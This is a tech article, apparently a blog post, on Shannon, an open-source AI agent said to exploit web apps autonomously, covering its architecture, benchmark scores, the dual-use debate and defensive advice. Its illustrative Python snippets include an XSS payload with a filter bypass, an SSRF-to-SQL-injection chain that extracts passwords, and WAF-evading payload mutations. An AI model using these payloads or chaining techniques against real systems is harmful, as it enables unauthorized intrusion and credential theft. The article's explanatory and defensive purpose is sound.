Photo by ThisIsEngineering on Pexels (free license)

An open-source AI agent now exploits web application vulnerabilities with a 96% success rate on the XBOW benchmark, a standardized test suite of real-world web exploitation challenges. Shannon, built by Keygraph, does not assist a human pentester. It runs the entire attack chain autonomously: reconnaissance, vulnerability identification, payload generation, exploitation, and verification. No human in the loop. XBOW’s own proprietary agent scored 86% on the same benchmark. An open-source project beat the benchmark creator’s own tool by 10 percentage points.

That gap matters. When the best publicly available exploitation agent outperforms commercial alternatives, the economics of web application security change permanently. Anyone who can clone a GitHub repo and run a Python script now has access to exploitation capabilities that required years of specialist training six months ago.

Related: AI Pentesting Agents: Can Autonomous Red Teams Replace Human Hackers?

How Shannon Works: Hierarchical Agents, Not Prompt Engineering

Shannon is not a wrapper around ChatGPT with a “hack this website” prompt. It uses a hierarchical multi-agent architecture, the same design pattern that XBOW’s own research identified as critical for effective autonomous exploitation.

The Planner-Executor Split

At the top sits a planner agent, an LLM-powered orchestrator that decomposes a target into an attack strategy. Below it, specialized executor sub-agents handle specific tasks: one browses web pages and analyzes HTML, another sends HTTP requests and interprets responses, a third generates and mutates exploit payloads.

The planner maintains state across the entire attack chain. When the XSS payload gets filtered, it does not start over. It tells the payload sub-agent to try a different encoding while the browser sub-agent maps out alternative injection points. This is the same observe-reason-act loop that makes agentic AI frameworks effective in other domains, applied to offensive security.
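The planner-executor split can be sketched in a few lines of Python. This is a toy illustration of the pattern, not Shannon's actual code: the `Planner`, `PayloadAgent`, and the lambda-based filter are all hypothetical names invented for this example.

```python
from dataclasses import dataclass, field

@dataclass
class AttackState:
    """Strategic context the planner carries across the whole attack."""
    findings: list = field(default_factory=list)
    failed_payloads: list = field(default_factory=list)

class PayloadAgent:
    """Executor sub-agent: mutates a payload until a variant passes the filter."""
    ENCODINGS = [
        lambda p: p,                                          # raw payload first
        lambda p: p.replace("<", "%3C").replace(">", "%3E"),  # URL-encode brackets
    ]

    def try_payload(self, base, is_filtered):
        for encode in self.ENCODINGS:
            candidate = encode(base)
            if not is_filtered(candidate):
                return candidate
        return None  # every variant was filtered

class Planner:
    """Orchestrator: observe the filter's response, reason, delegate, keep state."""
    def __init__(self):
        self.state = AttackState()
        self.payload_agent = PayloadAgent()

    def run(self, base_payload, is_filtered):
        if is_filtered(base_payload):
            # Observe the failure, record it in strategic state, and delegate
            # re-encoding to the sub-agent instead of starting over.
            self.state.failed_payloads.append(base_payload)
            variant = self.payload_agent.try_payload(base_payload, is_filtered)
        else:
            variant = base_payload
        if variant:
            self.state.findings.append(variant)
        return variant

# Toy filter that blocks the literal string "<script>".
blocks_script_tag = lambda p: "<script>" in p
planner = Planner()
result = planner.run("<script>alert(1)</script>", blocks_script_tag)
```

The key design point survives even in this sketch: the failed payload stays in the planner's state while the sub-agent retries with fresh tactics, so the strategic context never resets.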

Why Hierarchical Beats Monolithic

XBOW’s own research confirms why this matters. A single monolithic agent struggles with multi-step exploits because it loses context. By the time it has enumerated 40 endpoints and tested 200 payloads, the conversation window is saturated. The hierarchical design solves this: the planner holds the strategic context while sub-agents handle tactical execution with fresh context windows.

The practical result: Shannon chains vulnerabilities. It finds an SSRF, uses it to access internal services, discovers a SQL injection on an internal endpoint, and extracts data. Multi-step exploitation that would take a junior pentester hours happens in minutes.
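A chain like that can be sketched mechanically: each step's output becomes the next step's input. The endpoints, internal host, and parameter names below are hypothetical, chosen only to show the composition.

```python
import urllib.parse

# Hypothetical targets: a public endpoint with an SSRF-able "url" parameter
# and an internal host reachable only from inside the network.
PUBLIC_ENDPOINT = "https://target.example/fetch"
INTERNAL_HOST = "10.0.0.5"

def build_sqli_url(internal_host):
    """Step 1: craft a UNION-based injection against the internal endpoint."""
    payload = "' UNION SELECT username, password FROM users--"
    return f"http://{internal_host}/report?id=1{urllib.parse.quote(payload)}"

def build_ssrf_url(public_endpoint, internal_url):
    """Step 2: smuggle the internal URL through the SSRF parameter."""
    return f"{public_endpoint}?url={urllib.parse.quote(internal_url, safe='')}"

inner = build_sqli_url(INTERNAL_HOST)
chain = build_ssrf_url(PUBLIC_ENDPOINT, inner)  # one request, two vulnerabilities
```

The final URL carries the SQL injection as an encoded passenger inside the SSRF parameter, which is exactly the kind of composition a planner with persistent state can discover and a stateless scanner cannot.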

What Shannon Actually Exploits

The XBOW benchmark covers the vulnerability classes that matter in production: SQL injection (union-based, blind, time-based), cross-site scripting (reflected, stored, DOM-based), server-side request forgery, authentication bypasses, file inclusion and upload vulnerabilities, and command injection. Shannon handles Level 1 single-step exploits and Level 2 multi-step chains that require combining multiple vulnerabilities in sequence.

96% across these categories means Shannon misses roughly 1 in 25 challenges. The 4% it fails on tends to involve novel vulnerability classes or heavily customized application logic that does not match patterns the LLM has seen in training data.

Related: OWASP Top 10 for Agentic Applications: Every Risk Explained with Real Attacks

The XBOW Benchmark: Why These Numbers Matter

The XBOW benchmark is not a CTF competition with puzzle-like challenges. XBOW deploys realistic web applications with known vulnerabilities as live targets. The agent gets a URL and a goal. No hints, no hand-holding, and, in the hint-free configuration, no source code access.

Benchmark Structure

XBOW organizes challenges into escalating difficulty levels. Level 1 tests single-step exploitation: find the SQL injection input, craft the payload, extract the flag. Level 2 requires chaining: discover an authentication bypass, use the elevated access to find an SSRF, pivot to an internal service, exploit a deserialization vulnerability there. Each level adds complexity that breaks less sophisticated agent architectures.

How Shannon Stacks Up

| Agent | XBOW Score | Type | Architecture |
|---|---|---|---|
| Shannon (Keygraph) | 96% | Open source | Hierarchical multi-agent |
| XBOW Agent | 86% | Proprietary | Hierarchical multi-agent |
| XBOW (HackerOne #1) | 1,000+ vulns | Proprietary | Production bug bounty |

XBOW’s own agent reached #1 on the HackerOne global leaderboard by finding over 1,000 vulnerabilities across real bug bounty programs, including a previously unknown vulnerability in Palo Alto Networks’ GlobalProtect VPN. Shannon’s higher benchmark score does not necessarily mean it would outperform XBOW on live targets, but it shows the open-source community can match proprietary research at the architecture level.

Context: The Broader AI Pentesting Market

Shannon enters a crowded space. Horizon3.ai’s NodeZero has run over 225,000 autonomous pentests with 5,200+ customers and 102% ARR growth. Pentera launched “Vibe Red Teaming” with natural language test direction. RunSybil raised $40M for continuous autonomous pentesting. Stanford’s ARTEMIS agent outperformed 9 of 10 human pentesters on a live university network at $18/hour.

What makes Shannon different: it is fully open source. You can read every line of code, understand the prompts, modify the agent architecture, and run it on your own infrastructure. No enterprise sales call required.

Open Source Offensive AI: The Dual-Use Problem

Shannon’s release reopens a debate that the security community has never resolved. Metasploit, Burp Suite, and nmap all started as tools that could be used for attack or defense. Shannon follows the same pattern, but the barrier to effective use is lower. Running Metasploit requires understanding exploitation concepts. Running Shannon requires a GitHub account and API keys.

The Case For Open Sourcing

Keygraph’s argument follows established precedent: defenders need to understand attacker capabilities. If a 96%-accurate autonomous exploitation agent exists, organizations need to test their defenses against it. Keeping it proprietary just means attackers build their own while defenders stay blind.

Open source also enables verification. When XBOW publishes a benchmark score, the community can reproduce it. When a vendor claims “AI-powered vulnerability detection,” Shannon provides a concrete comparison point. The code is the claim.

The Case Against

The counterargument is equally straightforward. Before Shannon, building an autonomous exploitation agent required significant ML engineering expertise, access to training data, and months of development. Now it requires git clone. The skills barrier that kept autonomous exploitation in the hands of well-funded research labs and state actors has evaporated.

Reddit’s r/netsec community raised valid concerns: the XBOW benchmark, while realistic, is still a controlled environment. Production web applications have WAFs, rate limiting, CAPTCHAs, and monitoring that the benchmark does not replicate. Shannon’s 96% in the lab might translate to significantly less in the wild. But “significantly less than 96%” is still a lot.

Regulatory Implications

The EU AI Act classifies AI systems by risk level. An autonomous exploitation tool operating without human oversight could fall under high-risk or even prohibited categories depending on how it is deployed. Organizations using Shannon for internal pentesting would need to document its use under Article 9 risk management obligations. Using it against targets without explicit authorization remains straightforwardly illegal under the Computer Fraud and Abuse Act (US) and Section 202a StGB (Germany).

Related: AI Agents in Cybersecurity: Offense, Defense, and the Arms Race
Related: MITRE ATLAS Adds 14 Agentic AI Attack Techniques, and Your SOC Needs All of Them

What This Means for Your Web Application Security

If you run web applications, the calculus just changed. The question is no longer “will someone skilled enough find our SQL injection?” It is “will someone run an open-source script that finds it automatically?”

Immediate Actions

Run Shannon against your own applications. If an open-source tool with zero customization finds vulnerabilities, attackers will too. This is the most direct way to understand your exposure. Keygraph provides setup instructions for running Shannon in a controlled environment.

Assume your WAF is insufficient. Shannon generates exploit payloads iteratively, mutating them until they bypass filters. Static WAF rules that block known payloads do not stop an agent that generates novel variations. Invest in behavioral detection that identifies exploitation patterns regardless of payload encoding.
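A toy demonstration of why static rules fail: two trivial mutations of a classic injection string slip past a blocklist-style filter. The signatures and mutations here are illustrative, not drawn from any real WAF ruleset.

```python
import re
import urllib.parse

# A blocklist-style WAF: two signatures for classic SQLi and XSS strings.
STATIC_RULES = [
    re.compile(r"union\s+select", re.IGNORECASE),
    re.compile(r"<script", re.IGNORECASE),
]

def waf_blocks(payload: str) -> bool:
    return any(rule.search(payload) for rule in STATIC_RULES)

base = "' UNION SELECT password FROM users--"
mutations = [
    base,                          # raw payload: caught by the signature
    base.replace(" ", "/**/"),     # SQL comments instead of whitespace
    urllib.parse.quote(base),      # URL encoding hides the space between keywords
]
survivors = [m for m in mutations if not waf_blocks(m)]  # two of three get through
```

An agent that observes the block and mutates iteratively will find one of the surviving encodings in a handful of attempts; a static ruleset can only chase each variant after the fact.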

Shift to continuous testing. Annual pentests made sense when exploitation required human experts billing $200/hour. When the same coverage costs API credits, there is no reason not to run automated exploitation testing weekly or after every deployment.

Monitor for autonomous scanning. Shannon’s traffic patterns differ from traditional vulnerability scanners. It does not blast thousands of identical requests. It sends targeted, contextually appropriate requests that adapt based on responses. Your detection rules need to account for this.
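One hedged sketch of what such a rule might look for: clients that send many distinct probes to a single endpoint, rather than repeating identical requests at volume. The log format and threshold are assumptions made for this example, not a production detection.

```python
from collections import defaultdict

def flag_adaptive_clients(requests, distinct_threshold=5):
    """Flag (client, path) pairs that send many *distinct* query strings to
    one endpoint. Classic scanners repeat near-identical requests at volume;
    an adaptive agent sends varied, low-volume probes instead."""
    seen = defaultdict(set)  # (client, path) -> set of query strings observed
    for client, path, query in requests:
        seen[(client, path)].add(query)
    return {key for key, queries in seen.items()
            if len(queries) >= distinct_threshold}

# A noisy scanner repeating one request vs. an agent mutating each probe.
log = [("10.1.1.1", "/login", "user=admin")] * 50
log += [("10.2.2.2", "/search", f"q=variant_{i}") for i in range(6)]
flagged = flag_adaptive_clients(log)
```

Note that the high-volume client is the one this heuristic ignores: request diversity, not request count, is the signal that separates an adaptive agent from a traditional scanner.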

The Bigger Picture

DARPA’s AI Cyber Challenge (AIxCC) demonstrated that AI can both find and fix vulnerabilities. XBOW’s own autofix capability shows the same dual use in practice: the same agent architecture that discovers a SQL injection can generate the parameterized query that patches it. The future is not “AI breaks everything.” It is “AI breaks and fixes faster than humans on both sides.”
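That break-and-fix symmetry is easy to demonstrate in miniature. Below, the same input that dumps a table through string interpolation becomes inert data once the query is parameterized; this uses the standard sqlite3 module and is not XBOW's autofix output.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"  # classic injection string

# Vulnerable: string interpolation lets the input rewrite the WHERE clause,
# so the query matches every row.
vulnerable_sql = f"SELECT secret FROM users WHERE name = '{user_input}'"
leaked = conn.execute(vulnerable_sql).fetchall()

# Fixed: a parameterized query treats the same input as data, not SQL,
# so it matches no user and returns nothing.
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (user_input,)
).fetchall()
```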

Shannon is named after Claude Shannon, the father of information theory. The original Shannon proved that any communication channel has a maximum reliable throughput. The AI Shannon is proving something similar about web security: every web application has a maximum achievable security posture, and autonomous agents are converging on it from both the attack and defense sides simultaneously.

Frequently Asked Questions

What is Shannon AI and how does it work?

Shannon is an open-source autonomous AI agent built by Keygraph that finds and exploits web application vulnerabilities without human intervention. It uses a hierarchical multi-agent architecture with a planner agent that decomposes attacks into subtasks and specialized executor sub-agents that handle browsing, HTTP requests, and payload generation. It achieved a 96% success rate on the XBOW benchmark.

What is the XBOW benchmark for AI hacking agents?

The XBOW benchmark is a standardized test suite that measures AI agents’ ability to autonomously discover and exploit real-world web application vulnerabilities. It deploys realistic web applications with known vulnerabilities (SQL injection, XSS, SSRF, authentication bypasses, etc.) as live targets. Challenges are organized into escalating difficulty levels, from single-step exploits to multi-step vulnerability chains.

Is it legal to use Shannon?

Shannon is legal to use for authorized security testing on systems you own or have explicit written permission to test. Using it against systems without authorization is illegal under the Computer Fraud and Abuse Act (US), Section 202a StGB (Germany), and equivalent laws in most jurisdictions. Organizations using Shannon for internal pentesting under the EU AI Act may need to document its use under Article 9 risk management obligations.

How does Shannon compare to commercial AI pentesting tools?

Shannon scored 96% on the XBOW benchmark, compared to XBOW’s own proprietary agent at 86%. Commercial platforms like Horizon3.ai NodeZero and Pentera offer broader coverage (network, Active Directory, not just web apps), enterprise integrations, and compliance reporting. Shannon’s advantage is that it is fully open source, free, and web-application-focused. Its disadvantage is the lack of enterprise features, support, and broader attack surface coverage.

What vulnerabilities can Shannon find autonomously?

Shannon autonomously discovers and exploits SQL injection (union-based, blind, time-based), cross-site scripting (reflected, stored, DOM-based), server-side request forgery (SSRF), authentication and authorization bypasses, file inclusion and upload vulnerabilities, and command injection. It can chain multiple vulnerabilities in sequence for multi-step exploitation.